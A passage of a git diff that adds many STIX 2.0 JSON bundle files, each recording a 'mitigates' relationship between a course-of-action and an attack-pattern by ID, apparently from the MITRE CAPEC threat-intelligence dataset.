"attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bdbe3425-bc01-42c2-ae13-4307f4300cf8.json b/capec/relationship/relationship--bdbe3425-bc01-42c2-ae13-4307f4300cf8.json new file mode 100644 index 0000000000..ebb693369b --- /dev/null +++ b/capec/relationship/relationship--bdbe3425-bc01-42c2-ae13-4307f4300cf8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--528545e9-f5b6-4568-b9e0-09138757e563", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bdbe3425-bc01-42c2-ae13-4307f4300cf8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056", + "target_ref": "attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--be3c1d6b-d331-4353-b22d-33fc18ee979a.json b/capec/relationship/relationship--be3c1d6b-d331-4353-b22d-33fc18ee979a.json new file mode 100644 index 0000000000..494be76af9 --- /dev/null +++ b/capec/relationship/relationship--be3c1d6b-d331-4353-b22d-33fc18ee979a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--242d63e0-bc26-41fe-8e1e-bc898d43b1ec", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--be3c1d6b-d331-4353-b22d-33fc18ee979a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb", + "target_ref": "attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--be3fde87-7de1-4c5d-a814-8e658302bc63.json b/capec/relationship/relationship--be3fde87-7de1-4c5d-a814-8e658302bc63.json new file mode 100644 index 0000000000..8f22517960 --- /dev/null +++ b/capec/relationship/relationship--be3fde87-7de1-4c5d-a814-8e658302bc63.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--02cdf2b0-fc18-4821-85d2-09540e243b6e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--be3fde87-7de1-4c5d-a814-8e658302bc63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9", + "target_ref": "attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7.json b/capec/relationship/relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7.json new file mode 100644 index 0000000000..fe6cec1c8a --- /dev/null +++ b/capec/relationship/relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--64f75e91-68f1-4521-b279-8fef24fb3442", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc", + "target_ref": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bef63288-a9ec-46f1-9212-708d0ea32d22.json b/capec/relationship/relationship--bef63288-a9ec-46f1-9212-708d0ea32d22.json new file mode 100644 index 0000000000..81fa06a2b8 --- /dev/null +++ b/capec/relationship/relationship--bef63288-a9ec-46f1-9212-708d0ea32d22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4cdeba4d-4bc3-4576-8365-8e44b2cb23f1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bef63288-a9ec-46f1-9212-708d0ea32d22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59", + "target_ref": "attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bf19970b-a040-4386-9015-519164a84e3e.json b/capec/relationship/relationship--bf19970b-a040-4386-9015-519164a84e3e.json new file mode 100644 index 0000000000..5f1faf1b98 --- /dev/null +++ b/capec/relationship/relationship--bf19970b-a040-4386-9015-519164a84e3e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a5f655ec-e2a3-41a6-8a50-71f8bf813211", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bf19970b-a040-4386-9015-519164a84e3e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0", + "target_ref": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319.json b/capec/relationship/relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319.json new file mode 100644 index 0000000000..0e1202d7f4 --- /dev/null +++ b/capec/relationship/relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--197c61bc-8dda-4e56-92a9-e05646e3be0b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0", + "target_ref": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8.json b/capec/relationship/relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8.json new file mode 100644 index 0000000000..b394959446 --- /dev/null +++ b/capec/relationship/relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f2598773-6d76-4b06-b464-cbebea61b1c7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf", + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--bfffc983-2c3b-4fba-9fad-62fafafffdb1.json b/capec/relationship/relationship--bfffc983-2c3b-4fba-9fad-62fafafffdb1.json new file mode 100644 index 0000000000..f0664f5059 --- /dev/null +++ b/capec/relationship/relationship--bfffc983-2c3b-4fba-9fad-62fafafffdb1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--67a42d32-a141-432a-83b7-b8c5274c319a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--bfffc983-2c3b-4fba-9fad-62fafafffdb1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6775324-11a4-4066-80ff-bc354993450c", + "target_ref": "attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c00c72a0-8eb1-4b19-b7d1-858ec5b569d5.json b/capec/relationship/relationship--c00c72a0-8eb1-4b19-b7d1-858ec5b569d5.json new file mode 100644 index 0000000000..4058410042 --- /dev/null +++ b/capec/relationship/relationship--c00c72a0-8eb1-4b19-b7d1-858ec5b569d5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--98e0ceb0-04d1-4790-850e-189edc4ba550", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c00c72a0-8eb1-4b19-b7d1-858ec5b569d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe.json b/capec/relationship/relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe.json new file mode 100644 index 0000000000..5416340cdc --- /dev/null +++ b/capec/relationship/relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d433aaa1-2f3b-470d-b18d-6128a497a750", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c054bc28-f5d2-42a2-aa76-11e6f91a034b.json b/capec/relationship/relationship--c054bc28-f5d2-42a2-aa76-11e6f91a034b.json new file mode 100644 index 0000000000..c148459bd5 --- /dev/null +++ b/capec/relationship/relationship--c054bc28-f5d2-42a2-aa76-11e6f91a034b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--97d74fe1-b27d-45cb-ad7f-2d9a13755aa9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c054bc28-f5d2-42a2-aa76-11e6f91a034b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238", + "target_ref": "attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c095e46c-44ee-4328-9514-b82653c95e7d.json b/capec/relationship/relationship--c095e46c-44ee-4328-9514-b82653c95e7d.json new file mode 100644 index 0000000000..4e7dc340a1 --- /dev/null +++ b/capec/relationship/relationship--c095e46c-44ee-4328-9514-b82653c95e7d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a997e973-bfcb-493c-a7d6-49dbf70d2050", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c095e46c-44ee-4328-9514-b82653c95e7d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dbf98824-2003-44af-87f6-70a7b758c158", + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba.json b/capec/relationship/relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba.json new file mode 100644 index 0000000000..d70f0bb48c --- /dev/null +++ b/capec/relationship/relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--63a0eb62-b96e-45f1-8d15-a2094bd13d11", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c10a2663-afd1-4155-837d-0204962bc33b.json b/capec/relationship/relationship--c10a2663-afd1-4155-837d-0204962bc33b.json new file mode 100644 index 0000000000..001e30d95d --- /dev/null +++ b/capec/relationship/relationship--c10a2663-afd1-4155-837d-0204962bc33b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6e02bb32-db73-48e3-8f5a-477576aafbb4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c10a2663-afd1-4155-837d-0204962bc33b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c", + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c227b815-920b-4f06-a992-da5735203e11.json b/capec/relationship/relationship--c227b815-920b-4f06-a992-da5735203e11.json new file mode 100644 index 0000000000..fedcdf20c7 --- /dev/null +++ b/capec/relationship/relationship--c227b815-920b-4f06-a992-da5735203e11.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d6a2c61e-aa6b-4968-875d-80c30055f7f9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c227b815-920b-4f06-a992-da5735203e11", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a", + "target_ref": "attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c2ed3542-975b-48fd-b65c-cec9e9046ead.json b/capec/relationship/relationship--c2ed3542-975b-48fd-b65c-cec9e9046ead.json new file mode 100644 index 0000000000..56bb14ec50 --- /dev/null +++ b/capec/relationship/relationship--c2ed3542-975b-48fd-b65c-cec9e9046ead.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--161c81cc-4fe7-409a-9144-6d21006c11d2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c2ed3542-975b-48fd-b65c-cec9e9046ead", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945.json b/capec/relationship/relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945.json new file mode 100644 index 0000000000..fac3638679 --- /dev/null +++ b/capec/relationship/relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4e4c2d89-8173-4a52-97f1-4f3f4b096779", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--925956b6-2678-4433-9afe-3074a2ec9305", + "target_ref": "attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2.json b/capec/relationship/relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2.json new file mode 100644 index 0000000000..68255b7974 --- /dev/null +++ b/capec/relationship/relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9862c10-a39c-442f-a797-027da3e7c2e8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c373a9df-c5ca-4de1-bc88-a2ba81ddcf65.json b/capec/relationship/relationship--c373a9df-c5ca-4de1-bc88-a2ba81ddcf65.json new file mode 100644 index 0000000000..36ab94e685 --- /dev/null +++ b/capec/relationship/relationship--c373a9df-c5ca-4de1-bc88-a2ba81ddcf65.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c663c0e6-74ad-4d53-b722-693fd3f4aad0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c373a9df-c5ca-4de1-bc88-a2ba81ddcf65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a", + "target_ref": "attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b.json b/capec/relationship/relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b.json new file mode 100644 index 0000000000..9c0036a05d --- /dev/null +++ b/capec/relationship/relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0d89b137-15a0-4cb9-9972-ce1fa2a0b400", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23", + "target_ref": "attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c4a3ee46-a116-4224-a073-e75de578148d.json b/capec/relationship/relationship--c4a3ee46-a116-4224-a073-e75de578148d.json new file mode 100644 index 0000000000..4d29aac49e --- /dev/null +++ b/capec/relationship/relationship--c4a3ee46-a116-4224-a073-e75de578148d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3b743559-0035-4d74-b67b-7ebce52c3ee4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c4a3ee46-a116-4224-a073-e75de578148d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--77f86884-ad34-47be-ade7-4900af686435", + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c4b71657-f6fb-4546-983e-8fd276338402.json b/capec/relationship/relationship--c4b71657-f6fb-4546-983e-8fd276338402.json new file mode 100644 index 0000000000..3deb59b988 --- /dev/null +++ b/capec/relationship/relationship--c4b71657-f6fb-4546-983e-8fd276338402.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--34eb8a40-4e63-4d87-953a-6792e8740cd6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c4b71657-f6fb-4546-983e-8fd276338402", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c4fe5624-8c5e-4141-9db5-09a251aca913.json b/capec/relationship/relationship--c4fe5624-8c5e-4141-9db5-09a251aca913.json new file mode 100644 index 0000000000..3d97ae3ad3 --- /dev/null +++ b/capec/relationship/relationship--c4fe5624-8c5e-4141-9db5-09a251aca913.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--09aa4a68-bdce-484f-868c-396a2735952c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c4fe5624-8c5e-4141-9db5-09a251aca913", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d", + "target_ref": "attack-pattern--9e2a4e9f-633b-433e-a854-2705c5df916f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb.json b/capec/relationship/relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb.json new file mode 100644 index 0000000000..6ea6e3033d --- /dev/null +++ b/capec/relationship/relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d7f598ef-ebb7-4b3a-8ba4-b1c278748452", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c56ba4aa-f3c0-4445-b600-e4a5f3b357a2.json b/capec/relationship/relationship--c56ba4aa-f3c0-4445-b600-e4a5f3b357a2.json new file mode 100644 index 0000000000..5c10328d99 --- /dev/null +++ b/capec/relationship/relationship--c56ba4aa-f3c0-4445-b600-e4a5f3b357a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--93f9e2bf-f1c9-4f38-875b-de06e2da9993", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c56ba4aa-f3c0-4445-b600-e4a5f3b357a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c59c0b88-2a22-4feb-9521-220cbbe8a0c8.json b/capec/relationship/relationship--c59c0b88-2a22-4feb-9521-220cbbe8a0c8.json new file mode 100644 index 0000000000..584387a0ae --- /dev/null +++ b/capec/relationship/relationship--c59c0b88-2a22-4feb-9521-220cbbe8a0c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--75614c93-db56-42b4-ad6c-5d91d9d577a2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c59c0b88-2a22-4feb-9521-220cbbe8a0c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10.json b/capec/relationship/relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10.json new file mode 100644 index 0000000000..60bfab84bc --- /dev/null +++ b/capec/relationship/relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--354bcae2-f7d0-4017-b45e-9595bad05196", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": 